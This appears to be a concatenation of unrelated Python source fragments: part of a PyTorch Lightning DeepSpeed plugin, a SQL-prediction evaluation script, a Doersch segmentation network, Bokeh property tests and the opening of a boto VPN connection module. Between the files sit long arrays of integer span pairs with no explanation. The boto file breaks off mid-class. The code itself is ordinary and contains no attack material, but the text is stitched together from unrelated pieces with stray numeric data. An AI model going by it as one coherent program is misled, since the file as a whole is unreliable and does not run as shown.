zero_optimization: bool,
zero_allow_untested_optimizer: bool,
logging_batch_size_per_gpu: Union[str, int],
partition_activations: bool,
cpu_checkpointing: bool,
contiguous_memory_optimization: bool,
synchronize_checkpoint_boundary: bool,
offload_optimizer: bool,
offload_parameters: bool,
nvme_path: str,
offload_params_device: str,
params_buffer_count: int,
params_buffer_size: int,
max_in_cpu: int,
offload_optimizer_device: str,
optimizer_buffer_count: int,
pin_memory: bool,
block_size: int,
queue_depth: int,
single_submit: bool,
overlap_events: bool,
thread_count: int,
**zero_kwargs,
) -> Dict:
cfg = {
"activation_checkpointing": {
"partition_activations": partition_activations,
"cpu_checkpointing": cpu_checkpointing,
"contiguous_memory_optimization": contiguous_memory_optimization,
"synchronize_checkpoint_boundary": synchronize_checkpoint_boundary,
},
"aio": {
"block_size": block_size,
"queue_depth": queue_depth,
"single_submit": single_submit,
"overlap_events": overlap_events,
"thread_count": thread_count,
},
}
if zero_optimization:
zero_config = zero_kwargs
if offload_optimizer:
zero_config["offload_optimizer"] = {
"device": offload_optimizer_device,
"nvme_path": nvme_path,
"buffer_count": optimizer_buffer_count,
"pin_memory": pin_memory,
}
if offload_parameters:
zero_config["offload_param"] = {
"device": offload_params_device,
"nvme_path": nvme_path,
"buffer_count": params_buffer_count,
"buffer_size": params_buffer_size,
"max_in_cpu": max_in_cpu,
"pin_memory": pin_memory,
}
cfg = {
"zero_allow_untested_optimizer": zero_allow_untested_optimizer,
"zero_optimization": zero_config,
**cfg,
}
if logging_batch_size_per_gpu != "auto":
cfg = {"train_micro_batch_size_per_gpu": logging_batch_size_per_gpu, **cfg}
return cfg
@property
def deepspeed_engine(self):
return self.model
@property
def _multi_device(self) -> bool:
return self.num_processes > 1 or self.num_nodes > 1
def save_checkpoint(self, checkpoint: Dict, filepath: _PATH) -> None:
"""Save model/training states as a checkpoint file through state-dump and file-write.
Args:
checkpoint: The checkpoint state dictionary
filepath: write-target file's path
"""
if self.zero_stage_3 and self._multi_device and self.is_global_zero:
warning_cache.warn(
"When saving the DeepSpeed Stage 3 checkpoint, "
"each worker will save a shard of the checkpoint within a directory. "
"If a single file is required after training, "
"see https://pytorch-lightning.readthedocs.io/en/latest/advanced/advanced_gpu.html#"
"deepspeed-zero-stage-3-single-file for instructions."
)
# Use deepspeed's internal checkpointing function to handle partitioned weights across processes
# dump states as a checkpoint dictionary object
_exclude_keys = ["state_dict", "optimizer_states", "lr_schedulers"]
checkpoint = {k: v for k, v in checkpoint.items() if k not in _exclude_keys}
self.deepspeed_engine.save_checkpoint(filepath, client_state=checkpoint)
def load_checkpoint(self, checkpoint_path: _PATH) -> Dict[str, Any]:
if self.load_full_weights and self.zero_stage_3:
# Broadcast to ensure we load from the rank 0 checkpoint
# This doesn't have to be the case when using deepspeed sharded checkpointing
checkpoint_path = self.broadcast(checkpoint_path)
return super().load_checkpoint(checkpoint_path)
# Rely on deepspeed to load the checkpoint and necessary information
from pytorch_lightning.trainer.states import TrainerFn
is_fitting = self.lightning_module.trainer.state.fn == TrainerFn.FITTING
_, client_state = self.deepspeed_engine.load_checkpoint(
checkpoint_path, load_optimizer_states=is_fitting, load_lr_scheduler_states=is_fitting
)
if client_state is None:
raise MisconfigurationException(
"DeepSpeed was unable to load the checkpoint. Ensure you passed in a DeepSpeed compatible checkpoint "
"or a single checkpoint file with `Trainer(plugins=DeepSpeedPlugin(load_full_weights=True))`."
)
return client_state
@property
def lightning_restore_optimizer_and_schedulers(self) -> bool:
# managed by DeepSpeed
if self.load_full_weights and self.zero_stage_3 and self.lightning_module.trainer.state.fn == TrainerFn.FITTING:
rank_zero_warn(
"A single checkpoint file has been given. This means optimizer states and "
"scheduler states can not be restored. If you'd like to restore these states, you must "
"provide a path to the originally saved DeepSpeed checkpoint."
)
return False
def load_model_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the weights in `load_checkpoint()`
if self.load_full_weights and self.zero_stage_3:
self.model_to_device()
self._restore_zero_state(checkpoint)
def _restore_zero_state(self, ckpt: Mapping[str, Any]) -> None:
"""Overrides the normal load_state_dict behaviour in PyTorch to ensure we gather parameters that may be
sharded across processes before loading the state dictionary when using ZeRO stage 3. This is then
automatically synced across processes.
Args:
ckpt: The ckpt file.
"""
def load(module: torch.nn.Module, prefix=""):
missing_keys = []
unexpected_keys = []
error_msgs = []
state_dict = ckpt["state_dict"]
# copy state_dict so _load_from_state_dict can modify it
metadata = getattr(state_dict, "_metadata", None)
state_dict = state_dict.copy()
if metadata is not None:
state_dict._metadata = metadata
local_metadata = {} if metadata is None else metadata.get(prefix[:-1], {})
# because zero3 puts placeholders in model params, this context
# manager gathers (unpartitions) the params of the current layer, then loads from
# the state dict and then re-partitions them again
with deepspeed.zero.GatheredParameters(list(module.parameters(recurse=False)), modifier_rank=0):
if self.is_global_zero:
module._load_from_state_dict(
state_dict=state_dict,
prefix=prefix,
local_metadata=local_metadata,
strict=True,
missing_keys=missing_keys,
unexpected_keys=unexpected_keys,
error_msgs=error_msgs,
)
for name, child in module._modules.items():
if child is not None:
load(child, prefix + name + ".")
load(self.lightning_module, prefix="")
def load_optimizer_state_dict(self, checkpoint: Mapping[str, Any]) -> None:
# override to do nothing, deepspeed engine already loaded the states in `load_checkpoint()`
pass
@classmethod
def register_plugins(cls, plugin_registry: Dict) -> None:
plugin_registry.register("deepspeed", cls, description="Default DeepSpeed Plugin")
plugin_registry.register("deepspeed_stage_1", cls, description="DeepSpeed with ZeRO Stage 1 enabled", stage=1)
plugin_registry.register("deepspeed_stage_2", cls, description="DeepSpeed with ZeRO Stage 2 enabled", stage=2)
plugin_registry.register(
"deepspeed_stage_2_offload",
cls,
description="DeepSpeed ZeRO Stage 2 and CPU Offload",
stage=2,
offload_optimizer=True,
)
plugin_registry.register("deepspeed_stage_3", cls, description="DeepSpeed ZeRO Stage 3", stage=3)
plugin_registry.register(
"deepspeed_stage_3_offload",
cls,
description="DeepSpeed ZeRO Stage 3 and CPU Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
)
plugin_registry.register(
"deepspeed_stage_3_offload_nvme",
cls,
description="DeepSpeed ZeRO Stage 3 and NVMe Offload",
stage=3,
offload_optimizer=True,
offload_parameters=True,
remote_device="nvme",
offload_params_device="nvme",
offload_optimizer_device="nvme",
)
@property
def checkpoint_io(self) -> CheckpointIO:
return self._checkpoint_io
@checkpoint_io.setter
def checkpoint_io(self, plugin: CheckpointIO) -> None:
raise MisconfigurationException("DeepSpeed currently does not support custom checkpoint plugins.")
def validation_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def test_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
def predict_step(self, *args, **kwargs):
return self.model(*args, **kwargs)
| [
[
[
593,
603
],
[
20925,
20935
]
],
[
[
611,
615
],
[
16027,
16031
]
],
[
[
623,
630
],
[
4387,
4394
]
],
[
[
638,
640
],
[
15529,
15531
],
[
15673,
15675
],
[
15771,
15773
],
[
17021,
17023
],
[
17099,
17101
],
[
17179,
17181
],
[
17230,
17232
],
[
17286,
17288
]
],
[
[
648,
656
],
[
16432,
16440
]
],
[
[
681,
692
],
[
2162,
2173
],
[
2253,
2264
],
[
2303,
2314
],
[
2352,
2363
],
[
2410,
2421
]
],
[
[
713,
717
],
[
4332,
4336
],
[
15744,
15748
]
],
[
[
737,
740
],
[
2948,
2951
],
[
32377,
32380
],
[
34102,
34105
],
[
34413,
34416
],
[
36342,
36345
]
],
[
[
742,
750
],
[
24735,
24743
]
],
[
[
752,
756
],
[
29144,
29148
],
[
31139,
31143
],
[
32367,
32371
],
[
36535,
36539
]
],
[
[
758,
767
],
[
20990,
20999
]
],
[
[
769,
773
],
[
4477,
4481
],
[
24328,
24332
],
[
24334,
24338
],
[
24340,
24344
]
],
[
[
775,
782
],
[
34089,
34096
],
[
34400,
34407
],
[
36329,
36336
]
],
[
[
784,
792
],
[
4317,
4325
],
[
4420,
4428
],
[
4468,
4476
],
[
4534,
4542
],
[
18651,
18659
],
[
18690,
18698
]
],
[
[
794,
799
],
[
18634,
18639
],
[
24322,
24327
]
],
[
[
801,
806
],
[
4275,
4280
],
[
4326,
4331
],
[
18660,
18665
],
[
21533,
21538
],
[
28474,
28479
]
],
[
[
815,
820
],
[
1995,
2000
],
[
2998,
3003
],
[
3017,
3022
],
[
4482,
4487
],
[
18163,
18168
],
[
18217,
18222
],
[
21113,
21118
],
[
21167,
21172
],
[
24696,
24701
],
[
34780,
34785
]
],
[
[
845,
854
],
[
18640,
18649
]
],
[
[
863,
886
]
],
[
[
932,
959
],
[
2457,
2484
]
],
[
[
1031,
1049
],
[
4543,
4561
]
],
[
[
1109,
1121
],
[
37907,
37919
],
[
38019,
38031
]
],
[
[
1178,
1187
],
[
3111,
3120
]
],
[
[
1237,
1266
],
[
19153,
19182
],
[
19565,
19594
]
],
[
[
1312,
1321
],
[
33682,
33691
]
],
[
[
1362,
1369
],
[
27555,
27562
],
[
28146,
28153
]
],
[
[
1421,
1440
],
[
2970,
2989
]
],
[
[
1493,
1496
],
[
16611,
16614
]
],
[
[
1498,
1512
],
[
15553,
15567
],
[
19623,
19637
],
[
22443,
22457
],
[
27655,
27669
]
],
[
[
1514,
1528
],
[
28176,
28190
]
],
[
[
1580,
1605
],
[
12862,
12887
],
[
15817,
15842
],
[
17697,
17722
],
[
18926,
18951
],
[
25206,
25231
],
[
25689,
25714
],
[
33169,
33194
],
[
38056,
38081
]
],
[
[
1654,
1674
],
[
1919,
1939
],
[
12822,
12842
]
],
[
[
1720,
1730
],
[
16104,
16114
]
],
[
[
1777,
1782
],
[
31155,
31160
],
[
32357,
32362
]
],
[
[
1784,
1804
],
[
18666,
18686
]
],
[
[
1854,
1868
],
[
26113,
26127
],
[
33713,
33727
]
],
[
[
1870,
1882
],
[
1900,
1912
]
],
[
[
1884,
1897
],
[
31484,
31497
]
],
[
[
1952,
1961
],
[
14976,
14985
],
[
16819,
16828
],
[
18243,
18252
],
[
20091,
20100
],
[
21218,
21227
],
[
21801,
21810
],
[
23478,
23487
],
[
35543,
35552
]
],
[
[
1968,
1987
],
[
23426,
23445
]
],
[
[
2432,
2456
],
[
17939,
17963
],
[
24004,
24028
]
],
[
[
3095,
3110
]
]
] |
# coding=utf8
import os
import re
import json
import argparse
from sql.evaluator import compare_sqls
def evaluate(path, timeout=120):
with open(path, 'r') as f:
predictions = json.load(f)
total = len(predictions)
correct = 0
for pidx, p in enumerate(predictions):
truth = p['truth_logical_form']
pred = p['predicted_logical_form']
if compare_sqls(truth, pred):
correct += 1
print("Total: %d, Correct: %d, Accuracy: %f" %
(total, correct, float(correct / total)))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--predictions', help='file that stores the prediction results', required=True)
args = parser.parse_args()
evaluate(args.predictions)
| [
[
[
22,
24
]
],
[
[
32,
34
]
],
[
[
42,
46
],
[
190,
194
]
],
[
[
54,
62
],
[
589,
597
]
],
[
[
89,
101
],
[
390,
402
]
],
[
[
108,
116
],
[
763,
771
]
],
[
[
580,
586
],
[
619,
625
],
[
739,
745
]
],
[
[
732,
736
],
[
772,
776
]
]
] |
import torch
import torch.nn as nn
import torch.nn.functional as F
from proj.archs.cluster.vgg import VGGNet
from proj.archs.segmentation.net10a import SegmentationNet10aTrunk, \
SegmentationNet10a
from proj.utils.segmentation.baselines.general import get_patches
__all__ = ["SegmentationNet10aDoersch"]
class DoerschHead(nn.Module):
def __init__(self, config):
super(DoerschHead, self).__init__()
self.patch_side = config.doersch_patch_side
self.siamese_branch = nn.Sequential(
nn.Conv2d(in_channels=SegmentationNet10a.cfg[-1][0], out_channels=1024,
kernel_size=3, stride=1, padding=1, bias=False),
nn.BatchNorm2d(1024),
nn.ReLU(inplace=True)
)
self.joint = nn.Sequential(
nn.Linear(2 * 1024 * self.patch_side * self.patch_side, 1024),
nn.ReLU(True),
nn.Dropout(),
nn.Linear(1024, 9) # 9 gt positions, N, NE... NW.
)
def forward(self, patches1, patches2):
patches1 = self.siamese_branch(patches1)
patches2 = self.siamese_branch(patches2)
ni, k, h, w = patches1.size()
ni2, k2, h2, w2 = patches1.size()
if not ((ni == ni2) and (k == k2) and (h == h2) and (w == w2) and \
(h == self.patch_side) and (w == self.patch_side)):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
assert (False)
# flatten all but first dim
patches1 = patches1.contiguous() # otherwise view may behave funny
patches2 = patches2.contiguous()
patches1 = patches1.view(patches1.size(0), -1)
patches2 = patches2.view(patches2.size(0), -1)
concatenated = torch.cat((patches1, patches2), dim=1)
ni3, nf = concatenated.size()
if not ((ni3 == ni) and (nf == (2 * 1024 * self.patch_side *
self.patch_side))):
print(ni, k, h, w)
print(ni2, k2, h2, w2)
print(patches1.size())
print(patches2.size())
print(ni3, nf)
assert (False)
return self.joint(concatenated)
class SegmentationNet10aDoersch(VGGNet):
def __init__(self, config):
super(SegmentationNet10aDoersch, self).__init__()
self.patch_side = config.doersch_patch_side
self.input_sz = config.input_sz
self.features_sz = SegmentationNet10a.cfg[-1][0]
print("SegmentationNet10aDoersch: %d %d %d" % (self.patch_side,
self.input_sz,
self.features_sz))
self.features = SegmentationNet10aTrunk(config, cfg=SegmentationNet10a.cfg)
self.doersch_head = DoerschHead(config)
self._initialize_weights()
def forward(self, x, centre=None, other=None, penultimate=False):
x = self.features(x)
x = F.interpolate(x, size=self.input_sz, mode="bilinear")
if not penultimate:
assert ((centre is not None) and (other is not None))
patches1, patches2 = \
get_patches(x, centre, other, self.patch_side)
# predicted position distribution, no softmax - using
# torch.CrossEntropyLoss
# shape: bn, 9
x = self.doersch_head(patches1, patches2)
return x
| [
[
[
7,
12
],
[
1736,
1741
]
],
[
[
20,
34
],
[
330,
332
],
[
501,
503
],
[
528,
530
],
[
683,
685
],
[
717,
719
],
[
771,
773
],
[
798,
800
],
[
873,
875
],
[
900,
902
],
[
926,
928
]
],
[
[
42,
66
],
[
2955,
2956
]
],
[
[
103,
109
],
[
2208,
2214
]
],
[
[
153,
176
],
[
2699,
2722
]
],
[
[
184,
202
],
[
550,
568
],
[
2427,
2445
],
[
2735,
2753
]
],
[
[
257,
268
],
[
3155,
3166
]
],
[
[
270,
277
]
],
[
[
318,
329
],
[
388,
399
],
[
2787,
2798
]
],
[
[
2182,
2207
],
[
2263,
2288
]
]
] |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
import numpy as np
# Bokeh imports
from bokeh._testing.util.api import verify_all
from bokeh.core.has_props import HasProps
from bokeh.core.properties import (
Alias,
Dict,
Enum,
Float,
Instance,
Int,
List,
Nullable,
NumberSpec,
Override,
String,
)
from bokeh.models import Plot
# Module under test
import bokeh.core.properties as bcp # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'Alias',
'Alpha',
'AlphaSpec',
'Angle',
'AngleSpec',
'Any',
'AnyRef',
'Array',
'Auto',
'Base64String',
'Bool',
'Byte',
'Color',
'ColorHex',
'ColorSpec',
'ColumnData',
'Complex',
'DashPattern',
'DataSpec',
'Date',
'Datetime',
'Dict',
'DistanceSpec',
'Either',
'Enum',
'Factor',
'FactorSeq',
'Float',
'FontSize',
'FontSizeSpec',
'HatchPatternSpec',
'HatchPatternType',
'Image',
'Include',
'Instance',
'Int',
'Interval',
'JSON',
'List',
'MarkerSpec',
'MarkerType',
'MathString',
'MinMaxBounds',
'NonNegativeInt',
'NonNullable',
'Null',
'NullStringSpec',
'Nullable',
'NumberSpec',
'Override',
'PandasDataFrame',
'PandasGroupBy',
'Percent',
'PositiveInt',
'RGB',
'Readonly',
'Regex',
'RelativeDelta',
'RestrictedDict',
'Seq',
'Size',
'SizeSpec',
'String',
'StringSpec',
'Struct',
'TimeDelta',
'TextLike',
'Tuple',
'UnitsSpec',
'expr',
'field',
'validate',
'value',
'without_property_validation'
)
#-----------------------------------------------------------------------------
# General API
#----------------------------------------------------------------------------
# TODO (bev) These tests should be moved to better places
class TestBasic:
def test_simple_class(self) -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1, 2, 3])
zz = Dict(String, Int)
s = Nullable(String(None))
f = Foo()
assert f.x == 12
assert f.y == "hello"
assert np.array_equal(np.array([1, 2, 3]), f.z)
assert f.s is None
assert {"x", "y", "z", "zz", "s"} == f.properties()
with_defaults = f.properties_with_values(include_defaults=True)
assert dict(x=12, y="hello", z=[1,2,3], zz={}, s=None) == with_defaults
without_defaults = f.properties_with_values(include_defaults=False)
assert dict() == without_defaults
f.x = 18
assert f.x == 18
f.y = "bar"
assert f.y == "bar"
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar") == without_defaults
f.z[0] = 100
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3]) == without_defaults
f.zz = {'a': 10}
without_defaults = f.properties_with_values(include_defaults=False)
assert dict(x=18, y="bar", z=[100,2,3], zz={'a': 10}) == without_defaults
def test_enum(self) -> None:
class Foo(HasProps):
x = Enum("blue", "red", "green") # the first item is the default
y = Enum("small", "medium", "large", default="large")
f = Foo()
assert f.x == "blue"
assert f.y == "large"
f.x = "red"
assert f.x == "red"
with pytest.raises(ValueError):
f.x = "yellow"
f.y = "small"
assert f.y == "small"
with pytest.raises(ValueError):
f.y = "yellow"
def test_inheritance(self) -> None:
class Base(HasProps):
x = Int(12)
y = String("hello")
class Child(Base):
z = Float(3.14)
c = Child()
assert frozenset(['x', 'y', 'z']) == frozenset(c.properties())
assert c.y == "hello"
def test_set(self) -> None:
class Foo(HasProps):
x = Int(12)
y = Enum("red", "blue", "green")
z = String("blah")
f = Foo()
assert f.x == 12
assert f.y == "red"
assert f.z == "blah"
f.update(**dict(x=20, y="green", z="hello"))
assert f.x == 20
assert f.y == "green"
assert f.z == "hello"
with pytest.raises(ValueError):
f.update(y="orange")
def test_accurate_properties_sets(self) -> None:
class Base(HasProps):
num = Int(12)
container = List(String)
child = Instance(HasProps)
class Mixin(HasProps):
mixin_num = Int(12)
mixin_container = List(String)
mixin_child = Instance(HasProps)
class Sub(Base, Mixin):
sub_num = Int(12)
sub_container = List(String)
sub_child = Instance(HasProps)
b = Base()
assert {"child"} == set(b.properties_with_refs())
assert {"num", "container", "child"} == b.properties()
m = Mixin()
assert set(m.properties_with_refs()) == {"mixin_child"}
assert m.properties() == {"mixin_num", "mixin_container", "mixin_child"}
s = Sub()
assert set(s.properties_with_refs()) == {"child", "sub_child", "mixin_child"}
assert s.properties() == {"num", "container", "child", "mixin_num", "mixin_container", "mixin_child", "sub_num", "sub_container", "sub_child"}
# verify caching
assert s.properties_with_refs() is s.properties_with_refs()
assert s.properties() is s.properties()
def test_accurate_dataspecs(self) -> None:
class Base(HasProps):
num = NumberSpec(12)
not_a_dataspec = Float(10)
class Mixin(HasProps):
mixin_num = NumberSpec(14)
class Sub(Base, Mixin):
sub_num = NumberSpec(16)
base = Base()
mixin = Mixin()
sub = Sub()
assert {"num"} == set(base.dataspecs())
assert {"mixin_num"} == set(mixin.dataspecs())
assert {"num", "mixin_num", "sub_num"} == set(sub.dataspecs())
def test_not_serialized(self) -> None:
class NotSerialized(HasProps):
x = Int(12, serialized=False)
y = String("hello")
o = NotSerialized()
assert o.x == 12
assert o.y == 'hello'
# non-serialized props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
# but they aren't in the dict of props with values, since their
# values are not important (already included in other values,
# as with the _units properties)
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' not in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_readonly(self) -> None:
class Readonly(HasProps):
x = Int(12, readonly=True) # with default
y = Nullable(Int(), readonly=True) # without default
z = String("hello")
o = Readonly()
assert o.x == 12
assert o.y == None
assert o.z == 'hello'
# readonly props are still in the list of props
assert 'x' in o.properties()
assert 'y' in o.properties()
assert 'z' in o.properties()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'z' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
assert 'z' not in o.properties_with_values(include_defaults=False)
with pytest.raises(RuntimeError):
o.x = 7
with pytest.raises(RuntimeError):
o.y = 7
o.z = "xyz"
assert o.x == 12
assert o.y == None
assert o.z == 'xyz'
def test_include_defaults(self) -> None:
class IncludeDefaultsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsTest()
assert o.x == 12
assert o.y == 'hello'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
o.x = 42
o.y = 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_with_kwargs(self) -> None:
class IncludeDefaultsKwargsTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsKwargsTest(x=14, y="world")
assert o.x == 14
assert o.y == 'world'
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' in o.properties_with_values(include_defaults=False)
assert 'y' in o.properties_with_values(include_defaults=False)
def test_include_defaults_set_to_same(self) -> None:
class IncludeDefaultsSetToSameTest(HasProps):
x = Int(12)
y = String("hello")
o = IncludeDefaultsSetToSameTest()
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
# this should no-op
o.x = 12
o.y = "hello"
assert 'x' in o.properties_with_values(include_defaults=True)
assert 'y' in o.properties_with_values(include_defaults=True)
assert 'x' not in o.properties_with_values(include_defaults=False)
assert 'y' not in o.properties_with_values(include_defaults=False)
def test_override_defaults(self) -> None:
class FooBase(HasProps):
x = Int(12)
class FooSub(FooBase):
x = Override(default=14)
def func_default():
return 16
class FooSubSub(FooBase):
x = Override(default=func_default)
f_base = FooBase()
f_sub = FooSub()
f_sub_sub = FooSubSub()
assert f_base.x == 12
assert f_sub.x == 14
assert f_sub_sub.x == 16
assert 12 == f_base.properties_with_values(include_defaults=True)['x']
assert 14 == f_sub.properties_with_values(include_defaults=True)['x']
assert 16 == f_sub_sub.properties_with_values(include_defaults=True)['x']
assert 'x' not in f_base.properties_with_values(include_defaults=False)
assert 'x' not in f_sub.properties_with_values(include_defaults=False)
assert 'x' in f_sub_sub.properties_with_values(include_defaults=False)
# def test_kwargs_init(self) -> None:
# class Foo(HasProps):
# x = String
# y = Int
# z = Float
# f = Foo(x = "hello", y = 14)
# assert f.x == "hello"
# assert f.y == 14
# with pytest.raises(TypeError):
# # This should raise a TypeError: object.__init__() takes no parameters
# g = Foo(z = 3.14, q = "blah")
class Foo(HasProps):
pass
class Bar(HasProps):
pass
class Baz(HasProps):
pass
def test_HasProps_equals() -> None:
class Foo(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
class FooUnrelated(HasProps):
x = Int(12)
y = String("hello")
z = List(Int, [1,2,3])
v = Foo().equals(Foo())
assert v is True
v = Foo(x=1).equals(Foo(x=1))
assert v is True
v = Foo(x=1).equals(Foo(x=2))
assert v is False
v = Foo(x=1).equals(1)
assert v is False
v = Foo().equals(FooUnrelated())
assert v is False
def test_HasProps_clone() -> None:
p1 = Plot(width=1000)
c1 = p1.properties_with_values(include_defaults=False)
p2 = p1._clone()
c2 = p2.properties_with_values(include_defaults=False)
assert c1 == c2
def test_Alias() -> None:
class Foo(HasProps):
x = Int(12)
ax = Alias('x')
f = Foo(x=10)
assert f.x == 10
assert f.ax == 10
f.x = 20
assert f.x == 20
assert f.ax == 20
f.ax = 30
assert f.x == 30
assert f.ax == 30
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcp, ALL)
| [
[
[
527,
538
]
],
[
[
560,
566
],
[
569,
575
],
[
4426,
4432
],
[
4547,
4553
],
[
5320,
5326
],
[
9248,
9254
],
[
9310,
9316
]
],
[
[
772,
783
],
[
3099,
3101
],
[
3114,
3116
]
],
[
[
837,
847
],
[
14748,
14758
]
],
[
[
881,
889
],
[
13120,
13128
],
[
13151,
13159
],
[
13182,
13190
],
[
2832,
2840
],
[
4127,
4135
],
[
4661,
4669
],
[
4957,
4965
],
[
5453,
5461
],
[
5556,
5564
],
[
5587,
5595
],
[
5708,
5716
],
[
5855,
5863
],
[
6637,
6645
],
[
6741,
6749
],
[
7175,
7183
],
[
8351,
8359
],
[
9540,
9548
],
[
10409,
10417
],
[
10971,
10979
],
[
11801,
11809
],
[
13253,
13261
],
[
13367,
13375
],
[
13992,
14000
]
],
[
[
930,
935
],
[
14036,
14041
]
],
[
[
941,
945
],
[
2953,
2957
]
],
[
[
951,
955
],
[
4154,
4158
],
[
4235,
4239
],
[
5008,
5012
]
],
[
[
961,
966
],
[
4772,
4777
],
[
6710,
6715
]
],
[
[
972,
980
],
[
5547,
5555
],
[
5699,
5707
],
[
5846,
5854
]
],
[
[
986,
989
],
[
2859,
2862
],
[
2920,
2923
],
[
2966,
2969
],
[
4688,
4691
],
[
4984,
4987
],
[
5482,
5485
],
[
5622,
5625
],
[
5773,
5776
],
[
7202,
7205
],
[
8378,
8381
],
[
8444,
8447
],
[
9567,
9570
],
[
10436,
10439
],
[
10998,
11001
],
[
11828,
11831
],
[
13276,
13279
],
[
13329,
13332
],
[
13390,
13393
],
[
13443,
13446
],
[
14015,
14018
]
],
[
[
995,
999
],
[
2915,
2919
],
[
5514,
5518
],
[
5660,
5664
],
[
5809,
5813
],
[
13324,
13328
],
[
13438,
13442
]
],
[
[
1005,
1013
],
[
2987,
2995
],
[
8435,
8443
]
],
[
[
1019,
1029
],
[
6666,
6676
],
[
6776,
6786
],
[
6846,
6856
]
],
[
[
1035,
1043
],
[
11884,
11892
],
[
12007,
12015
]
],
[
[
1049,
1055
],
[
2883,
2889
],
[
2958,
2964
],
[
2996,
3002
],
[
4712,
4718
],
[
5053,
5059
],
[
5519,
5525
],
[
5665,
5671
],
[
5814,
5820
],
[
7244,
7250
],
[
8507,
8513
],
[
9591,
9597
],
[
10460,
10466
],
[
11022,
11028
],
[
13296,
13302
],
[
13410,
13416
]
],
[
[
1084,
1088
],
[
13775,
13779
]
],
[
[
1117,
1145
],
[
14759,
14762
]
],
[
[
1327,
1330
],
[
14764,
14767
]
],
[
[
2762,
2771
]
],
[
[
13116,
13119
]
],
[
[
13147,
13150
]
],
[
[
13178,
13181
]
],
[
[
13207,
13227
]
],
[
[
13735,
13754
]
],
[
[
13956,
13966
]
],
[
[
14733,
14745
]
]
] |
# Copyright (c) 2009-2010 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import boto
from datetime import datetime
from boto.resultset import ResultSet
"""
Represents a VPN Connectionn
"""
from boto.ec2.ec2object import TaggedEC2Object
class VpnConnectionOptions(object):
"""
Represents VPN connection options
:ivar static_routes_only: Indicates whether the VPN connection uses static
routes only. Static routes must be used for devices that don't support
BGP.
"""
def __init__(self, static_routes_only=None, tunnel_options=None):
self.static_routes_only = static_routes_only
self.tunnel_options = tunnel_options
def __repr__(self):
return 'VpnConnectionOptions'
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'staticRoutesOnly':
self.static_routes_only = True if value == 'true' else False
elif name == 'tunnelOptions':
self.tunnel_options = value
else:
setattr(self, name, value)
class VpnStaticRoute(object):
"""
Represents a static route for a VPN connection.
:ivar destination_cidr_block: The CIDR block associated with the local
subnet of the customer data center.
:ivar source: Indicates how the routes were provided.
:ivar state: The current state of the static route.
"""
def __init__(self, destination_cidr_block=None, source=None, state=None):
self.destination_cidr_block = destination_cidr_block
self.source = source
